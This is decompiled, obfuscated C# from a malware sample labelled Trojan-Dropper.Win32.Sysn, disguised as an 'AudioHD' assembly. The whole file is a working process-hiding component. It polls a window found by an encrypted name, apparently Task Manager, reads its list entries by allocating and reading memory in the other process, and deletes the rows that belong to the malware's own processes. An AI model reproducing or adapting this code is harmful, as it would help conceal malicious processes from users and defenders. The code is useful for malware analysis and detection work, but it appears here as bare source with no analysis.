// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe

using \u0001;
using \u0008;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;

namespace \u0008
{
  internal static class \u0005
  {
    [NonSerialized]
    internal static \u0002 \u0001;
    private static bool \u0001;
    private static DateTime \u0001;
    private static int \u0001;
    private static bool \u0002;

    public static void \u000F([In] Process obj0)
    {
      if (!\u0005.\u0001)
        \u0005.\u000F();
      \u0005.\u0001 obj = new \u0005.\u0001(obj0);
      \u0005.\u0002 = true;
    }

    private static void \u000F()
    {
      new Thread((ThreadStart) (() =>
      {
        while (true)
        {
          \u0005.\u0010();
          Thread.Sleep(10);
        }
      })).Start();
      \u0005.\u0001 = true;
    }

    private static void \u0010()
    {
      try
      {
        IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
        \u0006.\u0004 structure = new \u0006.\u0004();
        structure.\u0001 = Marshal.SizeOf((object) structure);
        \u0006.\u000F(mainWindowHandle, ref structure);
        bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
        IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
        IntPtr num2 = \u0006.\u000F(mainWindowHandle);
        IntPtr num3 = \u0006.\u0010(num2, 2);
        IntPtr num4 = \u0006.\u0010(num3, 1);
        uint num5 = \u0006.\u000F(num3, 0);
        if (num4 != IntPtr.Zero)
        {
          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
          \u0006.\u0010(num3, (uint) (int) num4, 1U);
        }
        \u0006.\u000F(num2, num5, 1U);
        if (flag1)
          \u0006.\u000F(num1);
        if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
        {
          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
          \u0005.\u0001 = DateTime.Now;
        }
        GC.Collect();
        int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
        if (num6 != \u0005.\u0001 || \u0005.\u0002)
        {
          \u0005.\u0002 = false;
          \u0005.\u0001 = num6;
          for (int index1 = 0; index1 < num6; ++index1)
          {
            string[] strArray = new string[10];
            for (int index2 = 0; index2 < 10; ++index2)
            {
              strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
              if (index2 > 0 && strArray[index2] == strArray[0])
                break;
            }
            foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
            {
              bool flag2 = false;
              bool flag3 = false;
              for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
              {
                if (strArray[index3].StartsWith(obj.\u0001))
                  flag2 = true;
                else if (strArray[index3] == obj.\u0002)
                  flag3 = true;
              }
              if (flag2 && flag3)
              {
                \u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
                --\u0005.\u0001;
                break;
              }
            }
          }
        }
        if (!flag1)
          return;
        \u0006.\u000F(IntPtr.Zero);
      }
      catch
      {
      }
    }

    private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
    {
      \u0006.\u0001 obj = new \u0006.\u0001();
      IntPtr hglobal = Marshal.AllocHGlobal(1024);
      uint lpdwProcessId;
      int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
      IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
      IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
      obj.\u0001 = 1U;
      obj.\u0001 = obj1;
      obj.\u0002 = obj2;
      obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
      obj.\u0003 = 50;
      \u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
      \u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
      \u0006.\u000F(num2, num3, hglobal, 1024, 0);
      string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
      Marshal.FreeHGlobal(hglobal);
      \u0006.\u000F(num2, num3, 0, 32768U);
      \u0006.\u0010(num2);
      return stringAnsi;
    }

    private static string \u000F([In] Process obj0)
    {
      foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
      {
        string[] args = new string[1]{ \u0005.\u0001(911) };
        if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
          return args[0];
      }
      return \u0005.\u0001(911);
    }

    static \u0005()
    {
      \u0003.\u000F();
      \u0005.\u0001 = DateTime.Now;
    }

    private sealed class \u0001
    {
      public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
      public string \u0001;
      public string \u0002;

      public \u0001([In] Process obj0)
      {
        this.\u0001 = obj0.ProcessName.ToLower();
        this.\u0002 = \u0005.\u000F(obj0).ToLower();
        lock (\u0005.\u0001.\u0001)
          \u0005.\u0001.\u0001.Add(this);
      }
    }
  }
}